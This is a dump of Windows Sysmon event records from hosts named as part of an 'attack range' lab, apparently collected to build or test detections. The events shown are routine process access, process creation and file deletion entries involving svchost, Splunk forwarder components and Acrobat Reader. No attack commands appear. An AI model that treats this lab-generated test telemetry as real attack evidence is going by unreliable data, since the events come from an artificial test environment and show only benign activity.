12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018851Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018850Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018849Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.358{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E668-63C7-4002-00000000B002}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018848Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.357{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E668-63C7-4002-00000000B002}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018847Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.357{E5A8D418-E668-63C7-4002-00000000B002}3616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018846Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:32.215{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19B755CFBB89CBF252F464A2780AB091,SHA256=1249B26E41B1BE901AEE13D9E0300A7EFCD58A55D1484A923E89981E5525EC68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000047771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.792{FE4C2B44-E653-63C7-8E06-00000000AF02}7120ATTACKRANGE\AdministratorC:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exeC:\Users\Administrator\AppData\Local\Temp\2\acrocef_low\0189143d-7a0a-4cf7-8657-0ded3fce4819.tmpMD5=B255C805110BEDD6225BA90F5A92B4D1,SHA256=285CE173F588E8B228344FD0C746C40048D029A27B430F840B5E45630416BB89,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.766{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.756{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:32.756{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader 